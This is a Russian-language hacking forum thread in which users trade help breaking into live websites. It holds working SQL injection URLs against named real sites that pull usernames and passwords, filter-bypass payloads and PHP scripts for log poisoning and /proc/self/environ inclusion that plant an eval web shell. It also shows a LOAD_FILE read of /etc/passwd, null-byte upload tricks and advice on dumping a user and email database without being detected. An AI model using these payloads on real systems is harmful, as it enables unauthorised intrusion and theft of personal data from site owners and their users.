тут можно ли провести инклуд?
На Win вполне:
?inc=Ic/../filo.txt%00
как то так

На Win вполне:
?inc=Ic/../filo.txt%00
как то так
На никсовых тоже сработает. Я если честно то забыл причину:( Что то в конфигах. Зависит не от оси.

На никсовых тоже сработает. Я если честно то забыл причину:( Что то в конфигах. Зависит не от оси.
угу, попробовал, и там и там работает, хотя я тоже помню какие то затыки были (другими словами не во всех случаях работает)

На Win вполне:
?inc=Ic/../filo.txt%00
как то так
честно я хромаю в инклуде.

перед ?inc=Ic/../filo.txt%00 надо найти бажный скрипт или просто include.php?inc=Ic/../filo.txt%00

Люди добрые, обьясните кто знает, что это за ошибка?SQL иньекция?
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 6

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 30


Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 59

о том что скрипт неможет соединиться с базой данных и неправильное использование функции eval()

о том что скрипт неможет соединиться с базой данных и неправильное использование функции eval()

спс!а из этого можно что-нибудь полезное сделать?

может быть можно выполнить пхп а может там еще что то есть на сайте, без линки гадать бессмысленно

ну тут постим может кто посоветует:
ну если на include.php
содержание:

<?php function __autoload($classname) {
if(substr($classname,0,2) == "Ic") {
$filename = "classes/" . $classname . ".php";
require $filename;
}
}
?>

тут можно ли провести инклуд?

вот просканировал с php bug scanner от Raz0r скрипт LcApi.php:

private function putCurl($url,$file) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_PUT, 1);
$fh = fopen($file,"r");
curl_setopt($ch, CURLOPT_INFILE, $fh);
curl_setopt($ch, CURLOPT_INFILESIZE, filesize($file));
$result = curl_exec($ch);
if (curl_errno($ch)) {
$result = curl_error($ch);
}
curl_close($ch);
if($this->debug) {
echo "PUT '$url'\n";
echo file_get_contents($file);
echo "RESPONSE\n'$result'\n";
}
return $result;
}

тут на $fh = fopen($file,"r");
и
echo file_get_contents($file);
указывает
может посоветуете как провести инклуд

ну тут есть функция, в параметрах которой передаётся $file. с лишь этим ничего не сделаешь. вот найдешь где эта функция вызывается, тогда поговорим дальше. возможность тут есть, если вызовется функция и в параметрах предастся значение которое мы в состоянии изменять под наши нужды.

ну тут есть функция, в параметрах которой передаётся $file. с лишь этим ничего не сделаешь. вот найдешь где эта функция вызывается, тогда поговорим дальше. возможность тут есть, если вызовется функция и в параметрах предастся значение которое мы в состоянии изменять под наши нужды.
тоесть надо найти где на каком скрипте вызывается функция $file?

вот еще допольнительно:

private function doPut($path,$file) {
$putdata = file_get_contents($file);

Люди добрые, обьясните кто знает, что это за ошибка?SQL иньекция?
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 6

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 30


Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 59
Прошу ответить кого-нибудь

Прошу ответить кого-нибудь
нет коннекта к БД

Прошу ответить кого-нибудь
да похож на sql инъекци на mysql но может коннект

Прошу ответить кого-нибудь
Пишет,что нет доступа юзеру апач.

Totgeliebt

http://la2.sz.ru/viewpage.php?page_id=13&clan_name=Administration&id=2
Да?
сайт сам в дауне вроде как, но похоже что просто удален пароль, или конфиг с credentials для БД

)) Вот меня ругают еще после такого....


Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'apache'@'localhost' (using password: NO) in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 6

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 30


Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /home/gamer/public_html/viewpage.php(26) : eval()'d code on line 59


Никакой sql-инъекции тут нет, просто раскрытие путей:

1. Нет соединения с базой
2. Нет соединения с базой - не может выполнить запрос
3. Нет соединения с базой - не может закрыть соединение с базой

Учите английский и php

PS: Зачем вообще пытаться сломать сайт, где нет соединения с БД и такие косяки с выводом ошибок?


тут на
и

указывает
может посоветуете как провести инклуд

смотря откуда берется $file. И то, это не инклуд, при самых сладких условиях - читалка

Ситуация:
mysql5 на винде2003, есть sql-injection, права рута, сайт лежит на d:\ - однако into outfile не работает (думаю нет виндовых прав на запись).

Что известно: каталог установки винды, имя учетки - стандартный administrator. FTP сервер не опознается по имени. Админки нету.

Вопрос: что можно сделать?

ищи диру под запись,админку, ws_ftp.log и т.п.
веб-сервер какой?

Какие есть методы заливки шелла, через форму загрузки изображения ?

Какие есть методы заливки шелла, через форму загрузки изображения ?

Смотря какая проверка расширения стоит

Есть sql-injection. Судя по всему вида:
select * from table limit 0, $vuln_param

Фильтруется *, ', "union_", "select_"
Т.е. union и select с пробелом, а также комментарий вида /* */ использовать нельзя. Соотвественно обламывается union/**/select/**/...
Что можно сделать?

После лимита ни join ни where не вставить.

вместо пробела можно попробовать табуляцию
можно вообще без пробелов вот например рабочий запрос:
select(1)union(select(1));

geezer.code
Не знал о таком, спасибо, однако после лимита вышеуказанная конструкция не срабатывает.
select * from table limit 0,2 (union(select 1))
Дает error in syntax

geezer.code
Не знал о таком, спасибо, однако после лимита вышеуказанная конструкция не срабатывает.

Дает error in syntax

а скакой версией ты работаеш?
если 5 то зачем тебе лимит?

budden ну так синтаксис и вправду неверный :) сравни еще раз запросы.
Еще в твоем случае надо быть уверенным что перед лимитом нет order by

geezer.code
Если ты про скобки в селекте вокруг единицы - то даже с ними идет еррор.

Тестю на локальной mysql5
select * from table limit 0,2(union(select(1)))--
Дает error, a не разное кол-во колонок.

budden, перечитайте пост гизера повнимательнее - юнион не нужно заключать в скобки

... limit 0,2 union(select(1));

krypt3r
Ага, прошу прощения, так работает.

Но как и предугадал geezer.code там оказался order by:
Wrong usage of UNION and ORDER BY

Т.е. имею дело с инъекцией вида:
select * from table order by some_field limit 0, $vuln_param

Такое обходится?

ЗЫ Спрашиваю вдруг есть элегантное решение, но сам тоже щас поищу.

Кстати, а mysql при такой ситуации говорит:
Incorrect usage of UNION and ORDER BY
Похоже это mysql4

Если в лимите и после order by то никак.

Если в лимите и после order by то никак. Можно, если FILE_PRIV = Y (В этой же теме вопрос уже всплывал).

Часто попадаеться шелл с фряхой 6.3. и на всех биндиться порт. Токо эксплоита не могу найти под неё. Можеть ктонить знает?

Не могу никак прорулить скуль.

В которой фильтрующийся слова select ,union, or, and, order, group

Warning: pg_query() [function.pg-query]: Query failed: ERROR: ошибка синтаксиса в или рядом "UNION" LINE 3: WHERE c.id = 57+UNION ^ in /opt/newrss/htdocs/sabre/libs/Db_pgsql.php on line 37

Warning: pg_query() [function.pg-query]: Query failed: ERROR: колонка "UNIONN" не существует LINE 3: WHERE c.id = 57+UNIONN ^ in /opt/newrss/htdocs/sabre/libs/Db_pgsql.php on line 37

узнал что стоит PostgreSQL 8.2.9 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070925 (Red Hat 4.1.2-27)

Прочитал http://forum.antichat.ru/thread35599.html результату не дало!(
Есть выход?)

"+" замени на пробел и все заработает)

http://dev.rssportal.ru/catalog/57'+order+by+1/*

<?php
$host = "www.ыаывпывпыпывпп";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$shell = file_get_contents("shell.php");
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),$shell) ?>'."\r\n";
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen($shell)."\r\n";
$head .= "\r\n$shell\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>

почему не работает? на сайте создаётся пустой файл (без кода)

http://dev.rssportal.ru/catalog/57'+order+by+1/*
dev.rssportal.ru/catalog/1111111111111111'1'union(select(null)from(select(1 ))a)
как то так

/add
или так
http://dev.rssportal.ru/catalog/1111111111111111'1'and(1)=version()::int

<?php
$host = "www.ыаывпывпыпывпп";
$port = 80;
$script = "/index.php?page=../../../../../../../proc/self/environ";
$shell = file_get_contents("shell.php");
$sock = fsockopen($host,$port);
if(!$sock)
echo "Error";
else
{
$head = "POST $script HTTP/1.1\r\n";
$head .= "Host: $host\r\n";
$head .= 'User-Agent: <?php fwrite(fopen("shell.php","w+"),$shell) ?>'."\r\n";
$head .= "Accept-Language: ru\r\n";
$head .= "Content-Type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Lenght: ".strlen($shell)."\r\n";
$head .= "\r\n$shell\r\n";
fwrite($sock,$head);
while(!feof($sock))
{
$respons .= fgets($sock,1024);
}
fclose($sock);
}
?>

почему не работает? на сайте создаётся пустой файл (без кода)

потому что php-скрипт, прописанный в user-agent, выполняется на стороне сервера (в чем и есть суть уязвимости), а ты пытаешься взять содержимое шелла со своего компьютера, а скрипт, записанный в user-agent, ищет файл на сервере, есс-но не находит и просто создает пустой файл. Вывод - все, что ты хочешь записать в файл - пиши прямо в php-код в user-agent, например <?if (isset($_REQUEST[data_time])) eval(stripslashes($_REQUEST[data_time]));?>

PS: Представляешь, чтобы было, если бы работало так, как ты хочешь? Я написал php-скрипт на сервере и читаю любой файл на ТВОЕМ компе? )))

слышал про http method:seccomp но везде говорят одинаково и нету подробного обьяснения

потому что php-скрипт, прописанный в user-agent, выполняется на стороне сервера (в чем и есть суть уязвимости), а ты пытаешься взять содержимое шелла со своего компьютера, а скрипт, записанный в user-agent, ищет файл на сервере, есс-но не находит и просто создает пустой файл. Вывод - все, что ты хочешь записать в файл - пиши прямо в php-код в user-agent, например <?if (isset($_REQUEST[data_time])) eval(stripslashes($_REQUEST[data_time]));?>

PS: Представляешь, чтобы было, если бы работало так, как ты хочешь? Я написал php-скрипт на сервере и читаю любой файл на ТВОЕМ компе? )))

спс. щас буду фиксить. я просто думал что интерпритатор, сам вместо той переменной подставит код, который в ней. а он это ХЗ почему не сделал.


UDP: Аааааааааааа всё допёр.

Такой вопрос. На сайте есть инклуд логов апача. Логи очень большие по ходу. можно ли написать скрипт на пыхе со спецальными заголовками. чтобы он проинлудил лог, а ответ не дожидал. потому что когда я в браузере инклужу большой лог, то у меня всё висит. подскажите плиз

<?php
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva');
curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;');
#echo $a;
echo 'ok';
?>

<?php
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera foreva');
curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://site.ru/index.php&file=../../../../../../../logs/error.log&cmd=copy.......;');
#echo $a;
echo 'ok';
?>



Pashkela, большое спасибо за код.

вот я проавильно подставил?

<?php
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "<?php fwrite(fopen('shell.php','w+'),'<?php phpinfo();?>') ?>");
curl_setopt($ch, CURLOPT_REFERER, "http://www.lala.jp");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}
$a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log');
#echo $a;
echo 'ok';
?>


UDP:

я так понял этот код работает как браузер. токо отличие в том, что он не выводить лог. т.е. там #echo $a;

закоментировано, и поэтому не томозит?. я правильно понял?

UPD: Pashekela, помоги пожалуйста найти рабочие логи, несколько перебрал, не логируют...

вот конфиг http://www.impan.pl/~ecmtb11/index.php?file=../../../../usr/local/apache2/conf/httpd.conf

) Грины заманали прикалываться:)

1. Одновременная запись данных юзер-агента в лог и их инклуд не прокатят - последовательно только
2. Где ты увидел в логах данные user-agent-ов? Там только ip и get-ы урлов.
3. Соответственно сначала get с php-кодом в строке URL, затем (второй раз вызов фукнции) уже инклуд


<?
@set_time_limit(0);
@ini_set("display_errors","1");
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Opera');
curl_setopt($ch, CURLOPT_REFERER, "http://www.KAKASHKA.ru");
$ss=curl_exec($ch);
curl_close($ch);
return $ss;
}


$a=get('http://www.impan.pl/~ecmtb11/index.php?file=<?eval(stripslashes($_REQUEST[cmd]));?>');
$a=get('http://www.impan.pl/~ecmtb11/index.php?file=../../../../var/apache/logs/www.access_log&cmd=phpinfo();');
echo $a;
#echo 'ok';
?>


в общем чото в этом роде, логи там мегов на 25 по-моему, но сегодня туда уже ничего не пишется. Ну и про прокси не забывай, кхм

PS: А вообще там нет инклуда, там fopen, но схема предоженная выше работает когда есть инклуд. Тут просто читалка файлов. Так что читай, ищи превад

Шутку с тильдой оценил)

PS: А вообще там нет инклуда, там fopen, но схема предоженная выше работает когда есть инклуд. Тут просто читалка файлов. Так что читай, ищи превад
точно, fopen(), бля какже я не заметил. ппц совсем крыша съехала...


PS Большой респект за консультацию. многое уточнил

Шутку с тильдой оценил)

А тут по подробней плиз)

А тут по подробней плиз)

ну если вспомнить, что ты мне писал в личку, а говорили мы про тулзу, то чтобы брутить пути в ней, ссылку надо просто взять в одинарные кавычки )

Matnya, и у тебя хватало наглости с такими знаниями выебываться на автора лфи брутера?

слышал про http method:seccomp но везде говорят одинаково и нету подробного обьяснения

http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/

https://addons.mozilla.org/en-US/firefox/addon/7595

примерный перевод:

Последней версией Доступа - Меня является Деяние - Меня, инструмент имел обыкновение проверять некоторую уязвимость доступа, связанную с веб-приложениями. Инструмент работает, посылая несколько версий последнего запроса страницы. Запрос с удаленной сессией пошлют. Запрос, используя глагол ГОЛОВЫ HTTP и запрос, израсходовав сделанный глагол SECCOM пошлют. Комбинацию сессии и HEAD/SECCOM также пошлют.

В общем всех пошлют

Такой вопрос. На сайте есть инклуд логов апача. Логи очень большие по ходу. можно ли написать скрипт на пыхе со спецальными заголовками. чтобы он проинлудил лог, а ответ не дожидал. потому что когда я в браузере инклужу большой лог, то у меня всё висит. подскажите плиз1. Открываешь сокет.
2. Пишешь в него запрос.
3. Закрываешь сокет.

http://labs.securitycompass.com/index.php/exploit-me/access-me/access-me-faq/

https://addons.mozilla.org/en-US/firefox/addon/7595

примерный перевод:



В общем всех пошлют
как я понял нету разумного обьяснения во всем рунете!!!

Можно ли провести здесь скулю?
$res=mysql_query("update peolpe set name='".$_POST["name"]."' where id='".$_POST["id"]."'");
Переменные name и id не фильтруются...

https://forum.antichat.ru/thread35207.html

http://localhost/script.asp?id=1%2Border%2Bby%2B100#
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'order'.

http://localhost/?page=%2Fmediascan%2Fnews%2Easp
Microsoft OLE DB Provider for SQL Server error '80040e10'
Procedure or function 'USP_GetMoreOverNewsByIDStory' expects parameter '@id_stories', which was not supplied.
есть ли тут скул или просто ошибка, вроде на order by ругается и на все что после asp?id=1

YuNi|[c
https://forum.antichat.ru/thread50550-OLE.html
спс за ответ но тут не access а mssql если не ошибаюсь.
Видимо тут просто ошибкабд и скулей врядли.
все равно спс

http://localhost/s.html?action='%20union%20select%201,2,3333%20from %20BJWSAPages%00
прошу помочь никак не могу удалит одинарную кавычку. Если убрат идет ошибка

1' union select 1,2,3 from table where '1'='1

1' union select 1,2,3 from table where '1'='1
помогло спс тока без кавычег 1=1
Теперь брутит до брутит наверное или можно сначала имя дб вывести?

Добрый вечер!
Подскажите пожалуйста, как сделать дамп базы данных MySQL имея логин и пароль от базы, а так же имя сайта.

Дело в том, что domain: SITE.RU и nserver: ns1.site.ru один и тот же. Я так понял, что у них теперь свой сервер? Раньше они хостились на masterhost.ru, там был путь: https://phpmyadmin.masterhost.ru и я делал дамп, но теперь пишет:phpMyAdmin - Ошибка
#2005 - Unknown MySQL server host 'admin.mysql.masterhost.ru' (1)

Что же делать? Как сделать дамп?

http://www.section404.org/news.php?id=-1%20union%20select%201,2,3,group_concat(id,0x3a,na me,0x3a,password),5,6+from+users--

за4ем так полу4ается ??

не показовает//

за4ем так полу4ается ??

не показовает//
Потому что таблички users не существует...

PS: Раздражают такие люди, которые любят "п0нт@нутьSя"...

Потому что таблички users не существует...

PS: Раздражают такие люди, которые любят "п0нт@нутьSя"...

Она существует но пустая

-1%20union%20select%201,2,3,count(*),5,6+from+users--

ЗЫ раньше он вообще на албани писал ((

YuNi|[c почитай статьи и разберешся если mysql 5 то есть схема, если ниже то брутить таблицы! Есть влом читать то тулзу пашкелы и вперед если надо брутить (и не только) . Если ось win, то в переменных пропишы окружения путь в path до интерпретатора perl и не забуть директиву роскоментировать в апаче если апач ScriptInterpreterSource registry или впишы ели ее нет и перегрузи windows. . потом win+r -> cmd -> perl путь до_тулзи_пашкели и там разберешся ;)
спс я уже про тулзу с его выхода знаю и сам протестил))
Тут не MySql а какой то с нестандартыми ответами Access с Jet компонентом. Все таки не смог брути таблицы никакого, наверное префикс надо гадать.

как можно выполнить инъекцию если на union на сайте стоит фильтр ?

как можно выполнить инъекцию если на union на сайте стоит фильтр ?
Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.

mailbrush - так и быть понтанусь
LokbatanLi - )))ya toze pisy translitom
http://www.section404.org/news.php?id=1/**/and/**/1=0%20/**/union/**/all/**/select/**/0,0,0,concat_ws%280x3a,username,password%29,0,0/**/from/**/config--

Все зависит от грамотности фильтра... Поиграйся с регистром и тд... Если ничего не получится - крути как блинд.
с регистром не прокатывает..

M1ks мне в лс ссылку если не трудно:(

как можно выполнить инъекцию если на union на сайте стоит фильтр ?
При наличии слова он его вырезает, или редирект, etc ?

http://www.discount.ru/search.html?find=-1%27&search=%E8%F1%EA%E0%F2%FC

нашел. Это sql-inj илил нет?

если да,помогите раскопать дальше

http://www.discount.ru/search.html?find=1%27+and+1%3C0+or+version%28%29%3 C4.1+and+version%28%29%3E3.9%2F*+&search=%E8%F1%EA%E0%F2%FC
версия 4.0*
полей 14, выводится 3е.
http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2 %2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4% 2F*&search=%E8%F1%EA%E0%F2%FC


зы удаляйте пробелы в коде.

M1ks коментариии повсталяй пример: un/**/ion
А ты сам попробуй раскрутить хоть какую-то скулю так... Не проканает, т.к. /**/ вместо пробела, и получится запрос
...un ion ...
И мускуль их интерпретирует как два разных оператора.

http://www.discount.ru/search.html?find=1%27+and+1%3C0+or+version%28%29%3 C4.1+and+version%28%29%3E3.9%2F*+&search=%E8%F1%EA%E0%F2%FC
версия 4.0*
полей 14, выводится 3е.
http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2 %2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4% 2F*&search=%E8%F1%EA%E0%F2%FC


зы удаляйте пробелы в коде.

таак.сппс. а дальше что делать?

сорри,новичок в этом)

Есть html код в которо можно менять 2 параметра одновлеменно это {xss}
Вопрос: как составить приавильно {xss} чтобы её небыло видно
Условие: html теги ружиться, пробовал регистр менять, не помогло

<a href="{xss}" target="_blank" class="name">{xss}</a>

И ещё 1 вопрос
Сервер на *nix
Есть форма для залива картинок, пробовал заливать картинки с именами img.php0x00.gif или img.php%00.gif
Но они так и сохраняются на сервере.
Вопрос: как можно попробовать обрезать тип файла и запустить как php (может я не правильно null байт применил?)

И ещё 1 вопрос
никак

таак.сппс. а дальше что делать?

сорри,новичок в этом)
Что дальше делать? Открыть статью по sql injection и прочитать. Гениально правда?

Здавствуйте помогите пожалуйста со скулой есть сайт выводит вот такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 5'
я так понял тут нужно Limit использовать?

имею доступ в админку (root). Нужно слить оттуда всю бд юзеров и их мыльники. В админке, кроме как редактирования различных разделов,добавлений нвостей, опросов, ничего нет, типа dump database и т.д. Шелл? Но как чтобы не спалится?
П.С. С шеллами дел почти не имел, поэтому, если этот метод в моем случае прокатит, то расскажите поподробнее)

имею доступ в админку (root). Нужно слить оттуда всю бд юзеров и их мыльники. В админке, кроме как редактирования различных разделов,добавлений нвостей, опросов, ничего нет, типа dump database и т.д. Шелл? Но как чтобы не спалится?
П.С. С шеллами дел почти не имел, поэтому, если этот метод в моем случае прокатит, то расскажите поподробнее)

лей шелл через админку (если это возможно), смотри конфиг подключения к бд, с шелла подключаешься к бд, сливаешь что тебе нужно.

лей шелл через админку (если это возможно), смотри конфиг подключения к бд, с шелла подключаешься к бд, сливаешь что тебе нужно.
как узнать возможно залить шелл или нет? В админке можно редактировать новости, а также есть система баннерной рекламы, где нужна ссылка на баннер, сам баннер, с моего компа( может быть именну тут и попробовать залить?) также можно выбрать с какого числа по которое показывать.
Да, и как не спалится, если я сейчас через баннер залью шелл и как мне потом к шеллу коннектиться?))

как узнать возможно залить шелл или нет? В админке можно редактировать новости, а также есть система баннерной рекламы, где нужна ссылка на баннер, сам баннер, с моего компа( может быть именну тут и попробовать залить?) также можно выбрать с какого числа по которое показывать.
Да, и как не спалится, если я сейчас через баннер залью шелл и как мне потом к шеллу коннектиться?))
Методом научного тыка.

http://www.sendas.org.ec/contenido.php?idM=[SQL]

Ещё один фильтр SQL иньекций с новым подходом.
Режет union и select при условии, что те упоминаются вместе и последовательно.
То есть так:
http://www.sendas.org.ec/contenido.php?idM=-1+union+select+1--&idP=0&lan=1
Ошибка 403.

А вот так:
http://www.sendas.org.ec/contenido.php?idM=-1+select+union+1--&idP=0&lan=1
Работает.

Как обойти?

ну например так:
http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1
added
http://www.sendas.org.ec
/contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2 )--&idP=0&lan=1

ну например так:
http://www.sendas.org.ec/contenido.php?idM=-1+union(select+1)--&idP=0&lan=1
added
http://www.sendas.org.ec
/contenido.php?idM=-1+union(select+1,2,3,4,5,6,7,8,9,version%28%29,1,2 )--&idP=0&lan=1

:D
http://www.sendas.org.ec/contenido.php?idM=%28-1%29union%28select%281%29,%282%29,%283%29,%284%29, %285%29,%286%29,%287%29,%288%29,%289%29,%28version %28%29%29,%281%29,%282%29%20%29--&idP=0&lan=1
без мочилова мозга мон и так
http://www.sendas.org.ec/contenido.php?idM=-1+union+all+select+1,2,3,4,5,6,7,8,9,version%28%29 ,11,12&idP=0&lan=1

Спасибо всем. Пашет на ура!

http://www.discount.ru/search.html?find=1%27+and+1%3C0+union+select+1%2C2 %2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C0%2C1%2C2%2C33%2C4% 2F*&search=%E8%F1%EA%E0%F2%FC

что дальше? что-то застрял..

немогу залить шелл через админку. Просто тупо не через что не заливается, да и путей залития практически нет, только баннерная реклама. Есть еще какие либо способы заливки шелла, и получения доступа к БД?

Есть. Купить мозг и назвать хотя бы ГДЕ ты пытаешься это сделать или сразу дать ссылку

Очередной вопрос по безопасности.
Товарищем Scipio был опубликован способ обхода Magic Quotes при заливке шелла через into outfile
Вот собственно сам способ (http://forum.antichat.ru/showpost.php?p=663815&postcount=39)
Так вот. У меня та-же ситуация щас, есть рутовый MySQL + Иньект с Magic Quotes
Полей тоже 3. Выводится инфа на экран только во 2 поле.
Вот в неё я и подставляю захексованый второй запрос:

id=-99999+union+select+1,0x2D3120756E696F6E2073656C656 37420276D616769635F716F74657320697320737578272F2A, 3/*

Но он выполняется как обычный текст, выводит просто:
-1 union select 'magic_qotes is sux'/*
В виде текста и всё....
Пробовал конечно /* менять на -- и т.д... но больше никак допереть не могу... Надеюсь что всё-таки что то можно сделать.

скипио показал пример с двойным запросом. это типа когда одно из полей результата первого запроса идёт во второй запрос.
у тебя ошибку выдает если в какое-нибудь поле подставить 0x27 = ковычка ?

Очередной вопрос по безопасности.
Товарищем Scipio был опубликован способ обхода Magic Quotes при заливке шелла через into outfile
Вот собственно сам способ (http://forum.antichat.ru/showpost.php?p=663815&postcount=39)
Так вот. У меня та-же ситуация щас, есть рутовый MySQL + Иньект с Magic Quotes
Полей тоже 3. Выводится инфа на экран только во 2 поле.
Вот в неё я и подставляю захексованый второй запрос:

id=-99999+union+select+1,0x2D3120756E696F6E2073656C656 37420276D616769635F716F74657320697320737578272F2A, 3/*

Но он выполняется как обычный текст, выводит просто:
-1 union select 'magic_qotes is sux'/*
В виде текста и всё....
Пробовал конечно /* менять на -- и т.д... но больше никак допереть не могу... Надеюсь что всё-таки что то можно сделать.
Ты посмотри внимательно код - там двойной запрос, точнее два запроса, а у тебя скорее всего один, как и во всех скулях...

Ты посмотри внимательно код - там двойной запрос, точнее два запроса, а у тебя скорее всего один, как и во всех скулях...
В моём случае хоть что нибудь сделать можно, чтобы обойти экранирование ковычек? ;(

В моём случае хоть что нибудь сделать можно, чтобы обойти экранирование ковычек? ;(
Нет.

проверить, нет ли там LFI одновременно со скулей. Если нет - тупо читать конфиги, дальше по ситуации

проверить, нет ли там LFI одновременно со скулей. Если нет - тупо читать конфиги, дальше по ситуации
ну конечно же есть. Но в LOAD_FILE код так-же не выполняется. и прочитать <?SHELL?> тоже нельзя ;(
Мне край ;(

прочитать <?SHELL?> тоже нельзя ;((
Кто тебе сказал, что через LOAD_FILE нельзя читать PHP-код?
проверить, нет ли там LFI одновременно со скулей. Если нет - тупо читать конфиги, дальше по ситуации
Это не является способом обхода кавычек :)

Кто тебе сказал, что через LOAD_FILE нельзя читать PHP-код?
А вот тут мнения у очень многих расходятся.
Но перевес идёт в счёт того что всё таки код выполнится, что меня очень радует.
Только вот уже минут 30 не могу найти тему про LFI на ачате как прочитать апачевые логи, сессии со вставленным php кодом....

А вот тут мнения у очень многих расходятся.
Но перевес идёт в счёт того что всё таки код выполнится, что меня очень радует.
такие вопросы голосованием не решаются ;)
не выполнится, только разве что скрипт зачем-нибудь поставит результаты запроса в eval. Полагаю, такая ситуация очень маловероятна

А вот тут мнения у очень многих расходятся.
Но перевес идёт в счёт того что всё таки код выполнится, что меня очень радует.
Только вот уже минут 30 не могу найти тему про LFI на ачате как прочитать апачевые логи, сессии со вставленным php кодом....
мне кажется ты путаешь читалку через sql-inj и php инклуд.
в твоем случае возможно есть чтение файлов через load_file(hex/char значение пути и имени). Но в этом случае ты читаешь файл, а не вынуждаешь его выполниться как php-код.
почитай про load_file

ps
Пример чтения /etc/passwd:
http://www.site.ru/index.php?page=-1+union+select+1,2,LOAD_FILE(char(47,101,116,99,47 ,112,97,115,115,119,100)),4,5,6/*

Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.

мне кажется ты путаешь читалку через sql-inj и php инклуд.
в твоем случае возможно есть чтение файлов через load_file(hex/char значение пути и имени). Но в этом случае ты читаешь файл, а не вынуждаешь его выполниться как php-код.
почитай про load_file

ps
Пример чтения /etc/passwd:
Я их НЕ путаю и спрашивал вопро конкретно про выполнение кода в load_file, а про инклуд я и так знаю.
Протестировал на локалхосте. Да, он только читает, но не выполняет. Учитывать Eval() в скрипте глупо.
Собственно что и требовалось доказать.
load_file - не выполняет код.

когда я говорил про LFI, то не имел в виду load_file, если вы не встречали таких скулей, где одновременно и скуля и LFI - то еще встретите. Просто надо внимательно читать ошибки, которые выводятся на экран.

Подскажите плиз. Мне нужен скрипт для залития аплоадера файлов через /proc/self/environ т.е. этот скрипт заливает аплоадер в корень сайта. раньше мне чел под ником попугай дал его. но у меня полетел сервак и скрипт пропал. может есть у кого.


Что значит залитие аплоадера файлов?
Через /proc/self/environ можно залить шелл. Читай, например, здесь (http://ahacc.ru/forum/showthread.php?t=27).

']чем он правильнее???


скуля не принтабельна, поэтому и не выводится ниодного поля

а вот и принтабельное поле 2 3 ))
http://www.wallstreetcorner.com/new_lop.html?ID=209+union+select+1,2,3,4+from+WSCO pinion%00&Unique=yes
тока дальше не подчиняется ((

люди,знаю, что много раз обсуждалось, но все же, на фтп на все папки стоят права 755,а на файлы 644, ничего не могу залить. Можно ли как то обойти эту проблему?
P.S. Если есть мануалы, с радостью почитаю

